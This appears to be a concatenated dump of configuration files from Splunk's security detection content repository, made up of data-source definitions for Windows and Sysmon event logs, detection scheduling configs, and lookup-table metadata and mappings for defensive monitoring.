15 | supported_TA: []
16 |
--------------------------------------------------------------------------------
/data_sources/splunk_common_information_model_(cim).yml:
--------------------------------------------------------------------------------
1 | name: Splunk Common Information Model (CIM)
2 | id: d3dd8270-7e1c-4bcd-8f3a-e5ec4a0e740a
3 | version: 1
4 | date: '2025-01-14'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for Splunk CIM
7 | source: not_applicable
8 | sourcetype: not_applicable
9 | supported_TA:
10 | - name: Splunk Common Information Model (CIM)
11 | url: https://splunkbase.splunk.com/app/1621
12 | version: 6.0.4
13 |
--------------------------------------------------------------------------------
/data_sources/splunk_stream_tcp.yml:
--------------------------------------------------------------------------------
1 | name: Splunk Stream TCP
2 | id: 4b1233d1-f80a-4da1-ab27-a5b10ea8a4ce
3 | version: 2
4 | date: '2025-01-23'
5 | author: Patrick Bareiss, Splunk
6 | description: Logs TCP traffic captured by Splunk Stream, including details about source
7 | and destination IPs, ports, connection states, and packet-level metadata.
8 | mitre_components:
9 | - Network Traffic Content
10 | - Network Traffic Flow
11 | - Network Connection Creation
12 | - Response Metadata
13 | - Application Log Content
14 | source: stream:tcp
15 | sourcetype: stream:tcp
16 | supported_TA:
17 | - name: Splunk Stream
18 | url: https://splunkbase.splunk.com/app/1809
19 | version: 8.1.5
20 |
--------------------------------------------------------------------------------
/data_sources/sysmon_eventid_14.yml:
--------------------------------------------------------------------------------
1 | name: Sysmon EventID 14
2 | id: 77c4b345-0eab-415e-98c6-f4114b021723
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for Sysmon EventID 14
7 | source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
8 | sourcetype: xmlwineventlog
9 | separator: EventID
10 | configuration: https://github.com/SwiftOnSecurity/sysmon-config
11 | supported_TA:
12 | - name: Splunk Add-on for Sysmon
13 | url: https://splunkbase.splunk.com/app/5709
14 | version: 4.0.2
15 | fields:
16 | - _time
17 | example_log: |-
18 |
--------------------------------------------------------------------------------
/data_sources/windows_event_log_printservice_4909.yml:
--------------------------------------------------------------------------------
1 | name: Windows Event Log Printservice 4909
2 | id: 4c00e353-18b8-4de6-896d-83bc5817dbaa
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for Windows Event Log Printservice 4909
7 | source: XmlWinEventLog:Security
8 | sourcetype: xmlwineventlog
9 | separator: EventCode
10 | supported_TA:
11 | - name: Splunk Add-on for Microsoft Windows
12 | url: https://splunkbase.splunk.com/app/742
13 | version: 9.0.1
14 | fields:
15 | - _time
16 | example_log: |-
17 |
--------------------------------------------------------------------------------
/data_sources/windows_event_log_security_4728.yml:
--------------------------------------------------------------------------------
1 | name: Windows Event Log Security 4728
2 | id: c0cb4907-d715-41f2-a98a-4f4e75f248c1
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for Windows Event Log Security 4728
7 | source: XmlWinEventLog:Security
8 | sourcetype: xmlwineventlog
9 | separator: EventCode
10 | supported_TA:
11 | - name: Splunk Add-on for Microsoft Windows
12 | url: https://splunkbase.splunk.com/app/742
13 | version: 9.0.1
14 | fields:
15 | - _time
16 | output_fields:
17 | - dest
18 | example_log: |-
19 |
--------------------------------------------------------------------------------
/data_sources/windows_event_log_security_4731.yml:
--------------------------------------------------------------------------------
1 | name: Windows Event Log Security 4731
2 | id: 1bbc004e-a75e-4d94-a619-c5aaf5d11ed5
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for Windows Event Log Security 4731
7 | source: XmlWinEventLog:Security
8 | sourcetype: xmlwineventlog
9 | separator: EventCode
10 | supported_TA:
11 | - name: Splunk Add-on for Microsoft Windows
12 | url: https://splunkbase.splunk.com/app/742
13 | version: 9.0.1
14 | fields:
15 | - _time
16 | output_fields:
17 | - dest
18 | example_log: |-
19 |
--------------------------------------------------------------------------------
/data_sources/windows_event_log_security_4744.yml:
--------------------------------------------------------------------------------
1 | name: Windows Event Log Security 4744
2 | id: 244e0bd4-00b0-4091-b8b4-9d435aca6ad8
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for Windows Event Log Security 4744
7 | source: XmlWinEventLog:Security
8 | sourcetype: xmlwineventlog
9 | separator: EventCode
10 | supported_TA:
11 | - name: Splunk Add-on for Microsoft Windows
12 | url: https://splunkbase.splunk.com/app/742
13 | version: 9.0.1
14 | fields:
15 | - _time
16 | output_fields:
17 | - dest
18 | example_log: |-
19 |
--------------------------------------------------------------------------------
/data_sources/windows_event_log_security_4749.yml:
--------------------------------------------------------------------------------
1 | name: Windows Event Log Security 4749
2 | id: eb322056-01a3-4cd5-bc09-01140d33194a
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for Windows Event Log Security 4749
7 | source: XmlWinEventLog:Security
8 | sourcetype: xmlwineventlog
9 | separator: EventCode
10 | supported_TA:
11 | - name: Splunk Add-on for Microsoft Windows
12 | url: https://splunkbase.splunk.com/app/742
13 | version: 9.0.1
14 | fields:
15 | - _time
16 | output_fields:
17 | - dest
18 | example_log: |-
19 |
--------------------------------------------------------------------------------
/data_sources/windows_event_log_security_4754.yml:
--------------------------------------------------------------------------------
1 | name: Windows Event Log Security 4754
2 | id: 501a507e-3275-4c4b-9c44-53eecfeae487
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for Windows Event Log Security 4754
7 | source: XmlWinEventLog:Security
8 | sourcetype: xmlwineventlog
9 | separator: EventCode
10 | supported_TA:
11 | - name: Splunk Add-on for Microsoft Windows
12 | url: https://splunkbase.splunk.com/app/742
13 | version: 9.0.1
14 | fields:
15 | - _time
16 | output_fields:
17 | - dest
18 | example_log: |-
19 |
--------------------------------------------------------------------------------
/data_sources/windows_event_log_security_4759.yml:
--------------------------------------------------------------------------------
1 | name: Windows Event Log Security 4759
2 | id: 431e3520-505b-4ace-aced-cb51e3f7311e
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for Windows Event Log Security 4759
7 | source: XmlWinEventLog:Security
8 | sourcetype: xmlwineventlog
9 | separator: EventCode
10 | supported_TA:
11 | - name: Splunk Add-on for Microsoft Windows
12 | url: https://splunkbase.splunk.com/app/742
13 | version: 9.0.1
14 | fields:
15 | - _time
16 | output_fields:
17 | - dest
18 | example_log: |-
19 |
--------------------------------------------------------------------------------
/data_sources/windows_event_log_security_4783.yml:
--------------------------------------------------------------------------------
1 | name: Windows Event Log Security 4783
2 | id: 6b945150-785c-49a1-b705-56b42215630b
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for Windows Event Log Security 4783
7 | source: XmlWinEventLog:Security
8 | sourcetype: xmlwineventlog
9 | separator: EventCode
10 | supported_TA:
11 | - name: Splunk Add-on for Microsoft Windows
12 | url: https://splunkbase.splunk.com/app/742
13 | version: 9.0.1
14 | fields:
15 | - _time
16 | output_fields:
17 | - dest
18 | example_log: |-
19 |
--------------------------------------------------------------------------------
/data_sources/windows_event_log_security_4790.yml:
--------------------------------------------------------------------------------
1 | name: Windows Event Log Security 4790
2 | id: 1cc6ecbb-af04-432b-a224-02c65243ac88
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for Windows Event Log Security 4790
7 | source: XmlWinEventLog:Security
8 | sourcetype: xmlwineventlog
9 | separator: EventCode
10 | supported_TA:
11 | - name: Splunk Add-on for Microsoft Windows
12 | url: https://splunkbase.splunk.com/app/742
13 | version: 9.0.1
14 | fields:
15 | - _time
16 | output_fields:
17 | - dest
18 | example_log: |-
19 |
--------------------------------------------------------------------------------
/data_sources/windows_event_log_system_104.yml:
--------------------------------------------------------------------------------
1 | name: Windows Event Log System 104
2 | id: 577b9b41-6b37-44c4-9016-3d890b909050
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for Windows Event Log System 104
7 | source: XmlWinEventLog:Security
8 | sourcetype: xmlwineventlog
9 | separator: EventCode
10 | supported_TA:
11 | - name: Splunk Add-on for Microsoft Windows
12 | url: https://splunkbase.splunk.com/app/742
13 | version: 9.0.1
14 | fields:
15 | - _time
16 | output_fields:
17 | - dest
18 | example_log: |-
19 |
--------------------------------------------------------------------------------
/data_sources/windows_event_log_taskscheduler_201.yml:
--------------------------------------------------------------------------------
1 | name: Windows Event Log TaskScheduler 201
2 | id: 4c09ae64-01cd-4b65-8221-20f803b0d86e
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for Windows Event Log TaskScheduler 201
7 | source: XmlWinEventLog:Security
8 | sourcetype: xmlwineventlog
9 | separator: EventCode
10 | supported_TA:
11 | - name: Splunk Add-on for Microsoft Windows
12 | url: https://splunkbase.splunk.com/app/742
13 | version: 9.0.1
14 | fields:
15 | - _time
16 | output_fields:
17 | - dest
18 | example_log: |-
19 |
--------------------------------------------------------------------------------
/data_sources/windows_iis.yml:
--------------------------------------------------------------------------------
1 | name: Windows IIS
2 | id: 469335b3-b6ad-49e2-bbe6-47e15c1464a7
3 | version: 2
4 | date: '2025-01-23'
5 | author: Patrick Bareiss, Splunk
6 | description: Logs changes to IIS server configuration, including updates to settings,
7 | modules, authentication methods, and site bindings.
8 | mitre_components:
9 | - Service Modification
10 | - Cloud Service Modification
11 | - Configuration Modification
12 | - Application Log Content
13 | source: IIS:Configuration:Operational
14 | sourcetype: IIS:Configuration:Operational
15 | separator: EventID
16 | supported_TA:
17 | - name: Splunk Add-on for Microsoft Windows
18 | url: https://splunkbase.splunk.com/app/742
19 | version: 9.0.1
20 |
--------------------------------------------------------------------------------
/deployments/escu_default_configuration_anomaly.yml:
--------------------------------------------------------------------------------
1 | name: ESCU Default Configuration Anomaly
2 | id: a9e210c6-9f50-4f8b-b60e-71bb26e4f216
3 | date: '2021-12-21'
4 | author: Patrick Bareiss
5 | description: This configuration file applies to all detections of type anomaly.
6 | These detections will use Risk Based Alerting.
7 | scheduling:
8 | cron_schedule: 0 * * * *
9 | earliest_time: -70m@m
10 | latest_time: -10m@m
11 | schedule_window: auto
12 | alert_action:
13 | rba:
14 | enabled: true
15 | type: Anomaly
16 |
--------------------------------------------------------------------------------
/deployments/escu_default_configuration_baseline.yml:
--------------------------------------------------------------------------------
1 | name: ESCU Default Configuration Baseline
2 | id: 0f7ee854-1aad-4bef-89c5-5c402b488510
3 | date: '2021-12-21'
4 | author: Patrick Bareiss
5 | description: This configuration file applies to all detections of type baseline.
6 | scheduling:
7 | cron_schedule: 10 0 * * *
8 | earliest_time: -1450m@m
9 | latest_time: -10m@m
10 | schedule_window: auto
11 | type: Baseline
12 |
--------------------------------------------------------------------------------
/deployments/escu_default_configuration_correlation.yml:
--------------------------------------------------------------------------------
1 | name: ESCU Default Configuration Correlation
2 | id: 36ba498c-46e8-4b62-8bde-67e984a40fb4
3 | date: '2021-12-21'
4 | author: Patrick Bareiss
5 | description: This configuration file applies to all detections of type Correlation.
6 | These correlations will generate Notable Events.
7 | scheduling:
8 | cron_schedule: 0 * * * *
9 | earliest_time: -70m@m
10 | latest_time: -10m@m
11 | schedule_window: auto
12 | alert_action:
13 | notable:
14 | rule_description: '%description%'
15 | rule_title: '%name%'
16 | nes_fields:
17 | - user
18 | - dest
19 | type: Correlation
20 |
--------------------------------------------------------------------------------
/deployments/escu_default_configuration_hunting.yml:
--------------------------------------------------------------------------------
1 | name: ESCU Default Configuration Hunting
2 | id: cc5895e8-3420-4ab7-af38-cf87a28f9c3b
3 | date: '2021-12-21'
4 | author: Patrick Bareiss
5 | description: This configuration file applies to all detections of type hunting.
6 | scheduling:
7 | cron_schedule: 0 * * * *
8 | earliest_time: -70m@m
9 | latest_time: -10m@m
10 | schedule_window: auto
11 | type: Hunting
12 |
--------------------------------------------------------------------------------
/deployments/escu_default_configuration_ttp.yml:
--------------------------------------------------------------------------------
1 | name: ESCU Default Configuration TTP
2 | id: b81cd059-a3e8-4c03-96ca-e168c50ff70b
3 | date: '2021-12-21'
4 | author: Patrick Bareiss
5 | description: This configuration file applies to all detections of type TTP.
6 | These detections will use Risk Based Alerting and generate Notable Events.
7 | scheduling:
8 | cron_schedule: 0 * * * *
9 | earliest_time: -70m@m
10 | latest_time: -10m@m
11 | schedule_window: auto
12 | alert_action:
13 | notable:
14 | rule_description: '%description%'
15 | rule_title: '%name%'
16 | nes_fields:
17 | - user
18 | - dest
19 | rba:
20 | enabled: true
21 | type: TTP
22 |
--------------------------------------------------------------------------------
/detections/deprecated/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/detections/deprecated/.gitkeep
--------------------------------------------------------------------------------
/dist/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/dist/.gitkeep
--------------------------------------------------------------------------------
/docs/.gitignore:
--------------------------------------------------------------------------------
1 | _site
2 | .sass-cache
3 | .jekyll-cache
4 | .jekyll-metadata
5 | vendor
6 |
--------------------------------------------------------------------------------
/docs/mitre-map/coverage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/mitre-map/coverage.png
--------------------------------------------------------------------------------
/docs/static/attack_range.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/attack_range.png
--------------------------------------------------------------------------------
/docs/static/escu_app_logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/escu_app_logo.png
--------------------------------------------------------------------------------
/docs/static/escu_sb.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/escu_sb.png
--------------------------------------------------------------------------------
/docs/static/feature_detection.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/feature_detection.png
--------------------------------------------------------------------------------
/docs/static/feature_playbooks.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/feature_playbooks.png
--------------------------------------------------------------------------------
/docs/static/feature_stories.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/feature_stories.png
--------------------------------------------------------------------------------
/docs/static/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/logo.png
--------------------------------------------------------------------------------
/docs/static/splunk_banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/splunk_banner.png
--------------------------------------------------------------------------------
/docs/static/structure.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/structure.png
--------------------------------------------------------------------------------
/docs/static/team_photo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/docs/static/team_photo.png
--------------------------------------------------------------------------------
/docs/yaml-spec/macros_spec.yml:
--------------------------------------------------------------------------------
1 | name:
2 | type: str
3 | description: Name of the macro
4 | required: true
5 | definition:
6 | type: str
7 | description: Definition of the macro, replace with configurations for your Splunk Environment
8 | required: true
9 | description:
10 | type: str
11 | description: Description of the macro
12 | required: true
--------------------------------------------------------------------------------
/lookups/3cx_ioc_domains.yml:
--------------------------------------------------------------------------------
1 | name: 3cx_ioc_domains
2 | date: 2024-12-23
3 | version: 2
4 | id: 65c25399-4081-4ef1-b791-86f497d3380d
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of domains from the 3CX supply chain attack.
8 | match_type:
9 | - WILDCARD(domain)
10 | min_matches: 1
11 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/__mlspl_detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.yml:
--------------------------------------------------------------------------------
1 | name: __mlspl_detect_dns_data_exfiltration_using_pretrained_model_in_dsdl
2 | date: 2024-12-23
3 | version: 2
4 | id: db5df924-c34c-4b0f-9333-a08b2af98e65
5 | author: Splunk Threat Research Team
6 | lookup_type: mlmodel
7 | description: Detect DNS Data Exfiltration using pretrained Model in DSDL
8 | case_sensitive_match: false
9 |
--------------------------------------------------------------------------------
/lookups/__mlspl_detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.yml:
--------------------------------------------------------------------------------
1 | name: __mlspl_detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl
2 | date: 2024-12-23
3 | version: 2
4 | id: d5099bcb-420e-4eec-9714-db0590ea4f03
5 | author: Splunk Threat Research Team
6 | lookup_type: mlmodel
7 | description: Detect suspicious DNS txt records using Pretrained Model in DSDL
8 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/__mlspl_detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml:
--------------------------------------------------------------------------------
1 | name: __mlspl_detect_suspicious_processnames_using_pretrained_model_in_dsdl
2 | date: 2024-12-23
3 | version: 2
4 | id: 4660425a-4fdb-4a25-895b-abbd2557aa64
5 | author: Splunk Threat Research Team
6 | lookup_type: mlmodel
7 | description: Detect a suspicious processname using Pretrained Model in DSDL
8 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/__mlspl_pretrained_dga_model_dsdl.yml:
--------------------------------------------------------------------------------
1 | name: __mlspl_pretrained_dga_model_dsdl
2 | date: 2024-12-23
3 | version: 2
4 | id: 6c55ccdb-7006-4367-80b6-55bee5eae1a2
5 | author: Splunk Threat Research Team
6 | lookup_type: mlmodel
7 | description: Detect DGA domains using Pretrained Model in DSDL
8 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/__mlspl_unusual_commandline_detection.yml:
--------------------------------------------------------------------------------
1 | name: __mlspl_unusual_commandline_detection
2 | date: 2024-12-23
3 | version: 2
4 | id: e340177d-f2c5-4cb7-8b13-9f484934f648
5 | author: Splunk Threat Research Team
6 | lookup_type: mlmodel
7 | description: An MLTK model for detecting malicious commandlines
8 | case_sensitive_match: false
9 | min_matches: 1
10 |
--------------------------------------------------------------------------------
/lookups/ace_access_rights_lookup.csv:
--------------------------------------------------------------------------------
1 | access_rights_string,access_rights_value
2 | RC,Read permissions
3 | SD,Delete
4 | WD,Modify permissions
5 | WO,Modify owner
6 | RP,Read all properties
7 | WP,Write all properties
8 | CC,Create all child objects
9 | DC,Delete all child objects
10 | LC,List contents
11 | SW,All validated writes
12 | LO,List objects
13 | DT,Delete subtree
14 | CR,All extended rights
--------------------------------------------------------------------------------
/lookups/ace_access_rights_lookup.yml:
--------------------------------------------------------------------------------
1 | name: ace_access_rights_lookup
2 | date: 2024-12-23
3 | version: 2
4 | id: 26cf3fc4-cee2-431a-9583-c4a404a25275
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A lookup file that will contain translations for AD object ace access rights strings
8 |
9 |
--------------------------------------------------------------------------------
/lookups/ace_flag_lookup.csv:
--------------------------------------------------------------------------------
1 | flag_string,flag_value
2 | CI,Container inherit
3 | OI,Object inherit
4 | NP,No propagate
5 | IO,Inherit only
6 | ID,Inherited
7 | SA,Audit success
8 | FA,Audit failure
9 | TP,Trust protected filter
10 | CR,Critical
--------------------------------------------------------------------------------
/lookups/ace_flag_lookup.yml:
--------------------------------------------------------------------------------
1 | name: ace_flag_lookup
2 | date: 2024-12-23
3 | version: 2
4 | id: 1795f9f3-008a-4b6c-9d7b-9e79b15da9fc
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A lookup file that will contain translations for AD object ace flags strings
--------------------------------------------------------------------------------
/lookups/ace_type_lookup.csv:
--------------------------------------------------------------------------------
1 | ace_type_string,ace_type_value
2 | A,Access allowed
3 | D,Access denied
4 | OA,Object access allowed
5 | OD,Object access denied
6 | AU,Audit
7 | AL,Alarm
8 | OU,Object audit
9 | OL,Object alarm
10 | ML,Mandatory label
11 | XA,Callback access allowed
12 | XD,Callback access denied
13 | RA,Resource attribute
14 | SP,Scoped policy ID
15 | XU,Callback audit
16 | ZA,Callback object access allowed
17 | TL,Process trust label
18 | FL,Access filter
--------------------------------------------------------------------------------
/lookups/ace_type_lookup.yml:
--------------------------------------------------------------------------------
1 | name: ace_type_lookup
2 | date: 2024-12-23
3 | version: 2
4 | id: 86e4531f-a37e-430c-9d5f-1447af2bc619
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A lookup file that will contain translations for AD object ace type strings
--------------------------------------------------------------------------------
/lookups/advanced_audit_policy_guids.yml:
--------------------------------------------------------------------------------
1 | name: advanced_audit_policy_guids
2 | date: 2024-12-23
3 | version: 2
4 | id: e2581a3a-1254-4b93-ae8f-ccde22362f0c
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: List of GUIDs associated with Windows advanced audit policies
8 | match_type:
9 | - WILDCARD(GUID)
10 | min_matches: 1
11 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/api_call_by_user_baseline.yml:
--------------------------------------------------------------------------------
1 | name: api_call_by_user_baseline
2 | date: 2024-12-23
3 | version: 2
4 | id: 6f4b0d42-5f24-4992-98f9-aebbc7ced9bf
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A collection that will contain the baseline information for number of
8 | AWS API calls per user
9 | fields:
10 | - _key
11 | - arn
12 | - latestCount
13 | - numDataPoints
14 | - avgApiCalls
15 | - stdevApiCalls
16 |
--------------------------------------------------------------------------------
/lookups/applockereventcodes.yml:
--------------------------------------------------------------------------------
1 | name: applockereventcodes
2 | date: 2024-12-23
3 | version: 2
4 | id: 2fd8cc84-f4c8-4ab6-bd57-596f714a315f
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A csv of the ID and rule name for AppLocker event codes.
8 | match_type:
9 | - WILDCARD(AppLocker_Event_Code)
10 | min_matches: 1
11 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/asr_rules.yml:
--------------------------------------------------------------------------------
1 | name: asr_rules
2 | date: 2025-01-29
3 | version: 3
4 | id: 3886d687-ae77-4a61-99eb-e745083e391e
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A csv of the ID and rule name for ASR, Microsoft Attack Surface Reduction rules.
8 | match_type:
9 | - WILDCARD(ASR_Rule)
10 | min_matches: 1
11 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/attacker_tools.yml:
--------------------------------------------------------------------------------
1 | name: attacker_tools
2 | date: 2025-03-18
3 | version: 3
4 | id: 72620fe1-26cb-4cee-a6ee-8c6127056d81
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of tools used by attackers
8 | match_type:
9 | - WILDCARD(attacker_tool_names)
10 | min_matches: 1
11 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/aws_service_accounts.csv:
--------------------------------------------------------------------------------
1 | identity
2 |
--------------------------------------------------------------------------------
/lookups/aws_service_accounts.yml:
--------------------------------------------------------------------------------
1 | name: aws_service_accounts
2 | date: 2024-12-23
3 | version: 2
4 | id: 33868b47-48b2-42ad-8acb-0416772ae664
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A lookup file that will contain AWS Service accounts
--------------------------------------------------------------------------------
/lookups/baseline_blocked_outbound_connections.csv:
--------------------------------------------------------------------------------
1 | src_ip,numDataPoints,latestCount,avgBlockedConnections,stdevBlockedConnections
--------------------------------------------------------------------------------
/lookups/baseline_blocked_outbound_connections.yml:
--------------------------------------------------------------------------------
1 | name: baseline_blocked_outbound_connections
2 | date: 2024-12-23
3 | version: 2
4 | id: 3abebeea-215f-44aa-ba69-3c2e828b7887
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A lookup file that will contain the baseline information for number of
8 | blocked outbound connections
9 |
10 |
--------------------------------------------------------------------------------
/lookups/brandmonitoring_lookup.csv:
--------------------------------------------------------------------------------
1 | domain,domain_abuse
2 |
--------------------------------------------------------------------------------
/lookups/brandmonitoring_lookup.yml:
--------------------------------------------------------------------------------
1 | name: brandMonitoring_lookup
2 | date: 2024-12-23
3 | version: 2
4 | id: 6fff763a-d654-42dc-8e56-92c8e255ac55
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A file that contains look-a-like domains for brands that you want to
8 | monitor
9 | match_type:
10 | - WILDCARD(domain)
11 | min_matches: 1
--------------------------------------------------------------------------------
/lookups/browser_app_list.yml:
--------------------------------------------------------------------------------
1 | name: browser_app_list
2 | date: 2024-12-23
3 | version: 2
4 | id: a80ccd19-e46f-4a12-9ad7-e653ad646347
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of known browser application being targeted for credential extraction.
8 | default_match: false
9 | match_type:
10 | - WILDCARD(browser_process_name)
11 | - WILDCARD(browser_object_path)
12 | min_matches: 1
13 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/builtin_groups_lookup.yml:
--------------------------------------------------------------------------------
1 | name: builtin_groups_lookup
2 | date: 2025-01-29
3 | version: 3
4 | id: 7d0a0c1c-2ef0-48a9-87c6-de97a0ad1ccf
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A lookup file that will contain translations for builtin AD group strings
8 |
9 |
--------------------------------------------------------------------------------
/lookups/char_conversion_matrix.yml:
--------------------------------------------------------------------------------
1 | name: char_conversion_matrix
2 | date: 2024-12-23
3 | version: 2
4 | id: 0177cf7b-8cf9-412a-9919-d1919b8d59dc
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A simple conversion matrix for converting to and from UTF8/16 base64/hex/decimal encoding. Created mosty from https://community.splunk.com/t5/Splunk-Search/base64-decoding-in-search/m-p/27572#M177741, with small modifications for UTF16LE parsing for powershell encoding.
8 | match_type:
9 | - WILDCARD(data)
10 | min_matches: 1
11 | case_sensitive_match: true
--------------------------------------------------------------------------------
/lookups/cisco_secure_firewall_appid_remote_mgmt_and_desktop_tools.yml:
--------------------------------------------------------------------------------
1 | name: cisco_secure_firewall_appid_remote_mgmt_and_desktop_tools
2 | date: 2025-05-28
3 | version: 1
4 | id: eda38373-77c4-4e42-89c8-f53fa58f5319
5 | author: Nasreddine Bencherchali, Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of secure firewall application detectors metadata related to remote desktop and remote management utilities.
8 | min_matches: 1
9 | case_sensitive_match: false
10 |
--------------------------------------------------------------------------------
/lookups/cisco_secure_firewall_filetype_lookup.yml:
--------------------------------------------------------------------------------
1 | name: cisco_secure_firewall_filetype_lookup
2 | date: 2025-04-03
3 | version: 1
4 | id: 5850e5c3-543c-45b8-8b82-147ed49aba56
5 | author: Nasreddine Bencherchali, Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list that maps filetypes in cisco secure firewall threat defense with their ids and description
8 | min_matches: 1
9 | case_sensitive_match: false
10 |
--------------------------------------------------------------------------------
/lookups/cisco_snort_ids_to_threat_mapping.yml:
--------------------------------------------------------------------------------
1 | name: cisco_snort_ids_to_threat_mapping
2 | date: 2025-05-12
3 | version: 1
4 | id: f08ae6ce-d7a8-423e-a778-be7178a719f9
5 | author: Bhavin Patel, Nasreddine Bencherchali, Splunk Threat Research Team
6 | lookup_type: csv
7 | case_sensitive_match: false
8 | description: Mapping file of Snort IDs to Threats
9 | min_matches: 1
10 |
--------------------------------------------------------------------------------
/lookups/cloud_instances_enough_data.yml:
--------------------------------------------------------------------------------
1 | name: cloud_instances_enough_data
2 | date: 2024-12-23
3 | version: 2
4 | id: 2aabac97-9782-4156-9dfd-7c1fb7aab2a6
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A lookup to determine if you have a sufficient amount of time has passed to collect cloud instance data for behavioral searches
8 | fields:
9 | - _key
10 | - filter
11 | - enough_data
12 | match_type:
13 | - WILDCARD(filter)
14 |
--------------------------------------------------------------------------------
/lookups/decommissioned_buckets.yml:
--------------------------------------------------------------------------------
1 | name: decommissioned_buckets
2 | date: 2025-02-14
3 | version: 1
4 | id: b3a95eff-87cf-40f3-b6e0-5b1a11eed68f
5 | author: Bhavin Patel
6 | lookup_type: kvstore
7 | description: A lookup table of decommissioned S3 buckets created by baseline - Baseline of Open S3 Bucket Decommissioning. This lookup table is used by detections searches to trigger alerts when decommissioned buckets are detected.
8 | min_matches: 1
9 | fields:
10 | - _key
11 | - bucketName
12 | - hosts
13 | - firstEvent
14 | - lastEvent
15 | - events
16 | - policy_details
17 | - website_details
18 | - accountIds
19 | - userARNs
20 | - awsRegions
--------------------------------------------------------------------------------
/lookups/discovered_dns_records.csv:
--------------------------------------------------------------------------------
1 | count,domain,type,query,answer
--------------------------------------------------------------------------------
/lookups/discovered_dns_records.yml:
--------------------------------------------------------------------------------
1 | name: discovered_dns_records
2 | date: 2024-12-23
3 | version: 2
4 | id: ebf80033-0cc1-4256-a1cb-730ccbda36af
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A placeholder for a list of discovered DNS records generated by the baseline discover_dns_records
8 | min_matches: 1
9 |
--------------------------------------------------------------------------------
/lookups/domain_admins.csv:
--------------------------------------------------------------------------------
1 | username
2 | Administrator
